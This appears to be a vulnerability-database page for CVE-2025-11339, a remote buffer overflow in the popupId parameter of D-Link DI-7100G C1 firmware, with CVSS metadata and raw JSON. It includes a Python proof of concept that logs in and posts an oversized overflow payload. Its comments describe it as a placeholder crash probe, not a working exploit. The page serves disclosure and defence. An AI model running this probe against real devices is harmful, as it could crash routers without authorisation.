Security Vulnerability Report
CVE-2025-11339 CVSS 8.8 HIGH

CVE-2025-11339

Published: 2025-10-06 17:16:05
Last Modified: 2025-11-19 21:47:38

Description

A vulnerability has been found in D-Link DI-7100G C1 up to 20250928. This issue affects the function sub_4BD4F8 of the file /webchat/hi_block.asp of the component jhttpd. The manipulation of the argument popupId leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DI-7100G C1 firmware version <= 20250928

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11339 - D-Link DI-7100G C1 Buffer Overflow PoC
# Vulnerability: Buffer overflow in sub_4BD4F8 of /webchat/hi_block.asp via popupId parameter
# Affected: D-Link DI-7100G C1 (firmware up to 20250928)
# CVSS 3.1: 8.8 (HIGH)
#
# NOTE(review): this listing is a generic crash probe, not a working exploit.
# The filler length, the 4-byte "return address" and the trailing opcode bytes
# are placeholders; the advisory on this page gives no buffer size, offset or
# CPU architecture. The login URL and form field names are likewise not taken
# from the advisory. Treat its verdicts as hints, not as proof (see exploit()).
#
# Defender view: the request to look for in jhttpd / proxy logs is an
# authenticated POST to /webchat/hi_block.asp carrying an unusually long
# popupId value.

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# Silences the warning that verify=False would raise on HTTPS requests.
# Every URL built below is http://, where verify has no effect.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TARGET_URL = "http://{target}/webchat/hi_block.asp"
BUFFER_SIZE = 1024  # placeholder filler length; not derived from the advisory


def generate_payload() -> bytes:
    """
    Build the oversized popupId value sent by the probe.

    Returns BUFFER_SIZE bytes of b"A", then 4 bytes of 0x41, 64 bytes of
    0x90 and 32 bytes of 0xCC (1124 bytes with the default BUFFER_SIZE).

    NOTE(review): the advisory describes a buffer overflow (CWE-119 /
    CWE-120) in sub_4BD4F8 reached through popupId; that the overflow is
    stack-based and that a saved return address sits right after the
    filler is this script's assumption, not something the page states.
    """
    # Filler intended to run past the end of the destination buffer
    padding = b"A" * BUFFER_SIZE

    # Four filler bytes (0x41414141) standing in for a return address;
    # this is not an address from the firmware
    ret_address = b"\x41\x41\x41\x41"

    # 0x90 and 0xCC are x86 opcodes (NOP and INT3). The page does not state
    # the device's CPU architecture, so read these as inert filler.
    nop_sled = b"\x90" * 64
    shellcode_placeholder = b"\xcc" * 32  # INT3 breakpoint for debugging

    payload = padding + ret_address + nop_sled + shellcode_placeholder
    return payload


def exploit(target_ip: str, username: str, password: str) -> bool:
    """
    Send one oversized popupId request to the device and guess from the
    outcome whether it is affected by CVE-2025-11339.
    Requires low-privilege authentication (PR:L).

    Returns True when the probe request gets HTTP 500/502 or fails at the
    transport level, False when the login request raises or the probe gets
    any other status.

    NOTE(review): a True result is weak evidence. Any RequestException on
    the probe (timeout, unreachable host, refused connection) is reported as
    a possible crash, and a 500/502 can have unrelated causes. Confirm on
    the device itself (firmware version, jhttpd process state).
    """
    session = requests.Session()
    # NOTE(review): /login.asp and the username/password field names are
    # assumptions of this script; verify against the device's real login form.
    login_url = f"http://{target_ip}/login.asp"
    target_endpoint = TARGET_URL.format(target=target_ip)

    # Step 1: Authenticate with low-privilege credentials
    login_data = {
        "username": username,
        "password": password
    }

    # Only a raised exception counts as a failed login here. The response is
    # never inspected, so rejected credentials go unnoticed and the probe is
    # then sent without a valid session.
    try:
        session.post(login_url, data=login_data, verify=False, timeout=10)
    except Exception as e:
        print(f"[-] Login failed: {e}")
        return False

    # Step 2: Send crafted request with oversized popupId parameter
    payload = generate_payload()
    # latin-1 maps each byte 0x00-0xFF to one code point, so the bytes can be
    # placed in a str form field; how requests re-encodes them on the wire is
    # not controlled here.
    exploit_params = {
        "popupId": payload.decode('latin-1')
    }

    print(f"[*] Sending exploit payload to {target_endpoint}")
    try:
        response = session.post(
            target_endpoint,
            data=exploit_params,
            verify=False,
            timeout=10
        )
        print(f"[*] Response status: {response.status_code}")

        # A 500/502 is taken as a sign that the handler faulted
        if response.status_code == 500 or response.status_code == 502:
            print("[+] Target may be vulnerable - server error triggered")
            return True
    except requests.exceptions.RequestException as e:
        # Reported as a hit, but this branch also fires for plain network
        # errors that have nothing to do with the vulnerability
        print(f"[+] Connection failed - target may have crashed: {e}")
        return True

    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>")
        print(f"Example: {sys.argv[0]} 192.168.0.1 admin admin")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]

    # The boolean result is discarded, so the process exit status does not
    # reflect the outcome; only the printed lines do.
    exploit(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11339", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:04.683", "lastModified": "2025-11-19T21:47:37.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in D-Link DI-7100G C1 up to 20250928. This issue affects the function sub_4BD4F8 of the file /webchat/hi_block.asp of the component jhttpd. The manipulation of the argument popupId leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7100g_c1_firmware:2025-09-28:*:*:*:*:*:*:*", "matchCriteriaId": "7A967144-1055-4FC2-97F7-8E486F6D6D53"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7100g_c1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B661C392-F07F-4BF5-B559-B00693C63E94"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.327222", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327222", "source": 
"[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664635", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/zr11zfssl8h74bn3", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.yuque.com/jh0ng/vmpda6/zr11zfssl8h74bn3#Wjajr", "source": "[email protected]", "tags": ["Permissions Required"]}]}}